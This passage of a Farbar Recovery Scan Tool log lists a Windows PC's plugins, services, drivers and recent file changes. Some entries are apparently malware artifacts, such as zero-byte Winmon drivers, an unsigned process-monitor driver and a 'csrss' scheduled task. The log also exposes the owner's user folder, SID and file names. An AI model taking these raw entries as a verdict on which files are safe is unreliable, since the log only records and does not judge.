Inc -> Google LLC) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC) FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems) FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade) FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade) ==================== Services (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated) R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated) R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated) R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.) R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation) S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.) S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.) R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.) U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION) R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed] S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.) R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed] R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed] R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation) S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes) S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes) R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation) S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation) R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC) S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation) R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH) S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation) R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive) S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive) R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation) R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder) S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000 R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.paceap.com/InitiateActivation [X] ===================== Drivers (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer) S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> ) R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX(tm)) R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.) S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.) S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes) R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation) S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation) R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation) R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation) S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project) R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> ) S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> ) R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC) R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions) R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen) S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.) R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX) S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation) R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation) R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation) R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder) R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows (R) Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder) R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed] R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.) ==================== NetSvcs (Whitelisted) =================== (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.) ==================== One month (created) =================== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST 2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc 2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss 2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer 2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn 2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe 2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi 2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys 2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate 2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves 2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics 2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin 2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx 2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx 2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio 2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio 2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio 2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA 2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3 2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder 2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt 2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc 2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx 2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk 2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk 2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk 2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB} 2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder 2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources 2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources 2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox 2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe 2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys 2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys 2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys 2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion 2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android 2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero 2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7 2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll 2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll 2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll 2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll 2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit 2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero 2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero 2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero 2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero 2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware 2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4 2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4 2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock 2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks 2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks 2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity 2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits 2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit 2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits 2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier 2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier 2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows (R) Win 7 DDK provider) C:\Windows\system32\DXCpl.exe 2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll 2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows (R) Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe 2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll 2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll 2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll 2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll 2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll 2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll 2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll 2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll 2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll 2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll 2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll 2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe 2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe 2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll 2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll 2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll 2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll 2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll 2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll 2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll 2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll 2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe 2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll 2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe 2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll 2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll 2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe 2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll 2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll 2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll 2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll 2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe 2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll 2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet 2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet 2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029 2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028 2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk 2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools 2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk 2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber 2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master 2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk ==================== One month (modified) ================== (If an entry is included in the fixlist, the file/folder will be moved.) 2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace 2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla 2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI 2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat 2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat 2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF 2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA 2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer 2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT 2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder 2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise 2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI 2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys 2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys 2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol 2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64) 2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent 2019-11-24 18:20 - 2017-05-26 14:22 - 000000000 ____D C:\Users\SR\AppData\Local\CrashDumps 2019-11-24 17:01 - 2018-06-02 15:16 - 000000000 ____D C:\Windows\system32\SleepStudy 2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXStateBkp-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx 2019-11-24 14:47 - 2017-11-04 13:39 - 000013336 _____ C:\Windows\system32\BMXState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx 2019-11-24 14:47 - 2017-11-04 13:39 - 000011564 _____ C:\Windows\system32\DVCState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx 2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx 2019-11-24 14:47 - 2017-11-04 13:39 - 000001224 _____ C:\Windows\system32\BMXBkpCtrlState-{00000004-00000000-00000001-00001102-00000008-40041102}.rfx 2019-11-24 10:51 - 2018-04-12 01:38 - 000000000 ____D C:\Windows\AppReadiness 2019-11-23 18:35 - 2018-04-12 01:38 - 000000000 ___HD C:\Program Files\WindowsApps 2019-11-22 21:41 - 2017-05-26 15:08 - 000002096 _____ C:\Windows\Sandboxie.ini 